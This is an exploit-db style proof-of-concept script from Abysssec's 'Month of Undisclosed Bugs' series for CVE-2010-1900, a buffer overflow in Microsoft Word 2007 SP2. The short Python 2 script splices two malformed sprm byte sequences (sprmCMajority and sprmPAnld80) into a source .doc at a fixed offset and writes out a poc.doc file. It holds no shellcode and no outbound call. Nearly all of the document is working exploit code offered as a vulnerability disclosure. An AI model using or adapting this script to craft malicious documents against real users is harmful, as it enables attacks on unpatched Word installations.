Month Of Abysssec Undisclosed Bugs - Microsoft Word

`'''  
__ __ ____ _ _ ____   
| \/ |/ __ \ /\ | | | | _ \  
| \ / | | | | / \ | | | | |_) |  
| |\/| | | | |/ /\ \| | | | _ <  
| | | | |__| / ____ \ |__| | |_) |  
|_| |_|\____/_/ \_\____/|____/  
  
http://www.exploit-db.com/moaub11-microsoft-office-word-sprmcmajority-buffer-overflow/  
http://www.exploit-db.com/sploits/moaub-11-exploit.zip  
'''  
  
'''  
Title : Microsoft Office Word sprmCMajority buffer overflow  
Version : Word 2007 SP 2  
Analysis : http://www.abysssec.com  
Vendor : http://www.microsoft.com  
Impact : Critical  
Contact : shahin [at] abysssec.com , info [at] abysssec.com  
Twitter : @abysssec  
CVE : CVE-2010-1900  
  
'''  
  
import sys  
  
def main():  
  
try:  
fdR = open('src.doc', 'rb+')  
strTotal = fdR.read()  
str1 = strTotal[:4082]  
str2 = strTotal[4088:]  
  
sprmCMajority = "\x47\xCA\xFF" # sprmCMajority   
sprmPAnld80 = "\x3E\xC6\xFF" # sprmPAnld80  
  
fdW= open('poc.doc', 'wb+')  
fdW.write(str1)  
fdW.write(sprmCMajority)  
fdW.write(sprmPAnld80)   
fdW.write(str2)  
  
fdW.close()  
fdR.close()  
print '[-] Word file generated'  
except IOError:  
print '[*] Error : An IO error has occurred'  
print '[-] Exiting ...'  
sys.exit(-1)  
  
if __name__ == '__main__':  
main()  
  
`